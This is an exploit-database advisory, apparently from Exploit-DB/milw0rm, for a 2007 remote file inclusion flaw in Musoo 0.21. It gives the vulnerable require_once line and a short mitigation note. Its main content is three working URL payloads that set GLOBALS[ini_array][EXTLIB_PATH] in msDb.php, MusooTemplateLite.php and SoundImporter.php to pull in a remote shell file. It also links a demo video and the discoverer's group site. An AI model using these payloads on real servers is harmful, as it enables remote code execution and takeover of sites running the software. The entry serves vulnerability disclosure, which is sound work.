Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH]) Remote File Include

vendor:

Musoo

by:

GoLd_M

N/A

CVSS

N/A

Remote File Include

CWE

Product Name: Musoo

Affected Version From: 0.21

Affected Version To: 0.21

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH]) Remote File Include

The Musoo 0.21 version is vulnerable to remote file inclusion. The vulnerability exists in the 'msDb.php', 'MusooTemplateLite.php', and 'SoundImporter.php' files. An attacker can exploit this vulnerability by manipulating the 'GLOBALS[ini_array][EXTLIB_PATH]' parameter in the URL to include a malicious file. Three exploits are provided in the text, each targeting a different file.

Mitigation:

The vendor should release a patch to fix the remote file inclusion vulnerability in the affected files. Users are advised to update to the latest version of Musoo to mitigate this issue.

Source

Exploit-DB raw data:

# Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH])Remote File Include

# D.Script: 
      http://osx.freshmeat.net/redir/musoo/65735/url_tgz/musoo-0.21.tar.gz

# V.Code :
      require_once( $GLOBALS["ini_array"]["EXTLIB_PATH"].'/

# In :
      /msDb.php
      /modules/MusooTemplateLite.php
      /modules/SoundImporter.php

# Exploits:
      1:/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
      2:/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
      3:/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?

# Video
      http://norcalvex.org/v1d30/Musoo/Musoo-Video.rar

# Discovered by: 
      GoLd_M = [Mahmood_ali]

# Homepage: 
      http://www.Tryag.Com/cc

# Sp.Thanx To : 
      Tryag-Team & Asb-May's Team 

# milw0rm.com [2007-06-20]